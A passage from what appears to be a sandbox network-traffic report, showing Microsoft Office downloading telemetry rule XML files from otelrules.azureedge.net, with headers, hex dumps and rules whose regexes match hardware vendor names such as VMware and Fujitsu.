                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181221Z-r1755647c66xdwzbrg67s9avs400000005s000000000g0yk
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:21 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            21192.168.2.44977613.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:21 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:21 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                            ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                            x-ms-request-id: 1a39e609-901e-0048-60a3-26b800000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181221Z-r1755647c66ss75qkr31zpy1kc00000004xg00000000kpkq
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:21 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            22192.168.2.44977513.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:21 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:21 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                            ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                            x-ms-request-id: 9a09e836-e01e-0052-3cae-26d9df000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181221Z-17fbfdc98bbds27mnhu6ftg4d800000003ug000000003d3e
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:21 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            23192.168.2.44977713.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:21 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:21 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 494
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                            ETag: "0x8DC582BB7010D66"
                                                                                                                                                                            x-ms-request-id: bb58e6ef-e01e-000c-4187-288e36000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181221Z-r1755647c66p58nm9wqx75pnms00000004f000000000hh3z
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:21 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            24192.168.2.44977313.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:21 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:21 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                            ETag: "0x8DC582BA41997E3"
                                                                                                                                                                            x-ms-request-id: 6484a1a6-201e-0000-75a3-26a537000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181221Z-r1755647c66ldhdjeavapf4fd000000005eg000000006bax
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            25192.168.2.44978013.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:22 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                            ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                            x-ms-request-id: 4f99c795-b01e-0097-3bfd-274f33000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-17fbfdc98bb8mkvjfkt54wa53800000003cg0000000045xx
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:22 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            26192.168.2.44977813.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:22 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                            ETag: "0x8DC582B9748630E"
                                                                                                                                                                            x-ms-request-id: bfc21b6c-401e-0067-2636-2809c2000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-r1755647c66ss75qkr31zpy1kc0000000520000000007drt
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:22 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            27192.168.2.44978113.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:22 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                            ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                            x-ms-request-id: 8ee7b399-e01e-0033-0c50-234695000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-17fbfdc98bbvvplhck7mbap4bw000000075g0000000000c0
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:22 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            28192.168.2.44978213.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:22 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:22 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 428
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                            ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                            x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-r1755647c666s72wx0z5rz6s6000000006h0000000001fbe
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:22 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            29192.168.2.44977913.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:22 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:22 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                            ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                            x-ms-request-id: e2670bef-801e-008f-375d-232c5d000000
                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                            x-azure-ref: 20241028T181222Z-17fbfdc98bblfj7gw4f18guu2800000006u000000000btua
                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            2024-10-28 18:12:22 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                            30192.168.2.44978413.107.253.45443
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-10-28 18:12:23 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                            2024-10-28 18:12:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 28 Oct 2024 18:12:23 GMT
                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                            Content-Length: 415
